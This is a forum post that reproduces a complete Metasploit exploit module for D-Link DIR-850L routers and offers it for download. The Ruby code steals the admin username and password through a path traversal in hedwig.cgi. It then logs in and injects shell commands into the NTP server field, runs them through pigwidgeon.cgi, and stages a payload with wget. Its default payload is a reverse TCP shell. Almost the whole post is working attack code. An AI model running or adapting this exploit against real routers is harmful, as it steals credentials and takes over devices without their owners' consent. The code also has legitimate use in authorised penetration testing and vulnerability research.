Active Members Fi8sVrs Posted November 14, 2017 Active Members Report Share Posted November 14, 2017 (edited) This Metasploit module leverages an unauthenticated credential disclosure vulnerability to execute arbitrary commands on DIR-850L routers as an authenticated user. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'openssl' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'DIR-850L (Un)authenticated OS Command Exec', 'Description' => %q{ This module leverages an unauthenticated credential disclosure vulnerability to then execute arbitrary commands on DIR-850L routers as an authenticated user. Unable to use Meterpreter payloads. }, 'Author' => [ 'Mumbai', # https://github.com/realoriginal (module) 'Zdenda' # vuln discovery ], 'References' => [ ['URL', 'https://www.seebug.org/vuldb/ssvid-96333'], ['URL', 'https://blogs.securiteam.com/index.php/archives/3310'], ], 'DisclosureDate' => 'Aug 9 2017', 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE, 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsbe/shell/reverse_tcp' }, 'Privileged' => true, 'Payload' => { 'DisableNops' => true, }, 'Targets' => [[ 'Automatic', {} ]], )) end def check begin res = send_request_cgi({ 'uri' => '/', 'method' => 'GET' }) if res && res.headers['Server'] auth = res.headers['Server'] if auth =~ /DIR-850L/ if auth =~ /WEBACCESS\/1\.0/ return Exploit::CheckCode::Safe else return Exploit::CheckCode::Detected end end end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def report_cred(opts) service_data = { address: opts[:ip], port: opts[:port], service_name: opts[:service_name], protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { origin_type: :service, module_fullname: fullname, username: opts[:user], private_data: opts[:password], private_type: :password }.merge(service_data) login_data = { core: create_credential(credential_data), status: Metasploit::Model::Login::Status::UNTRIED, proof: opts[:proof] }.merge(service_data) create_credential_login(login_data) end # some other DIR-8X series routers are vulnerable to this same retrieve creds vuln as well... # should write an auxiliary module to-do -> WRITE AUXILIARY def retrieve_creds begin xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n" xml << "<postxml>\r\n" xml << "<module>\r\n" xml << " <service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service>\r\n" xml << "</module>\r\n" xml << "</postxml>" res = send_request_cgi({ 'uri' => '/hedwig.cgi', 'method' => 'POST', 'encode_params' => false, 'headers' => { 'Accept-Encoding' => 'gzip, deflate', 'Accept' => '*/*' }, 'ctype' => 'text/xml', 'cookie' => "uid=#{Rex::Text.rand_text_alpha_lower(8)}", 'data' => xml, }) if res.body =~ /<password>(.*)<\/password>/ # fixes stack trace issue parse = res.get_xml_document username = parse.at('//name').text password = parse.at('//password').text vprint_good("#{peer} - Retrieved the username/password combo #{username}/#{password}") loot = store_loot("dlink.dir850l.login", "text/plain", rhost, res.body) print_good("#{peer} - Downloaded credentials to #{loot}") return username, password else fail_with(Failure::NotFound, "#{peer} - Credentials could not be obtained") end rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") end end def retrieve_uid begin res = send_request_cgi({ 'uri' => '/authentication.cgi', 'method' => 'GET', }) parse = res.get_json_document uid = parse['uid'] challenge = parse['challenge'] return uid, challenge rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") end end def login(username, password) uid, challenge = retrieve_uid begin hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase send_request_cgi({ 'uri' => '/authentication.cgi', 'method' => 'POST', 'data' => "id=#{username}&password=#{hash}", 'cookie' => "uid=#{uid}" }) return uid rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") end end def execute_command(cmd, opts) uid = login(@username, @password) # reason being for loop is cause UID expires for some reason after executing 1 command payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n" payload << "<postxml>\r\n" payload << "<module>\r\n" payload << " <service>DEVICE.TIME</service>\r\n" payload << " <device>\r\n" payload << " <time>\r\n" payload << " <ntp>\r\n" payload << " <enable>1</enable>\r\n" payload << " <period>604800</period>\r\n" payload << " <server>#{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}&); </server>\r\n" payload << " </ntp>\r\n" payload << " <ntp6>\r\n" payload << " <enable>1</enable>\r\n" payload << " <period>604800</period>\r\n" payload << " </ntp6>\r\n" payload << " <timezone>20</timezone>\r\n" payload << " <time/>\r\n" payload << " <date/>\r\n" payload << " <dst>0</dst>\r\n" payload << " <dstmanual/>\r\n" payload << " <dstoffset/>\r\n" payload << " </time>\r\n" payload << " </device>\r\n" payload << "</module>\r\n" payload << "</postxml>" begin # save configuration res = send_request_cgi({ 'uri' => '/hedwig.cgi', 'method' => 'POST', 'ctype' => 'text/xml', 'data' => payload, 'cookie' => "uid=#{uid}" }) # execute configuration res = send_request_cgi({ 'uri' => '/pigwidgeon.cgi', 'method' => 'POST', 'data' => 'ACTIONS=SETCFG,ACTIVATE', 'cookie' => "uid=#{uid}" }) return res rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") end end def exploit print_status("#{peer} - Connecting to target...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable url") end # # Information Retrieval, obtains creds and logs in # @username, @password = retrieve_creds execute_cmdstager( :flavor => :wget, :linemax => 200 ) end end Download dlink_dir850l_unauth_exec.rb.txt Source Edited November 14, 2017 by Fi8sVrs 1 Quote Link to comment Share on other sites More sharing options...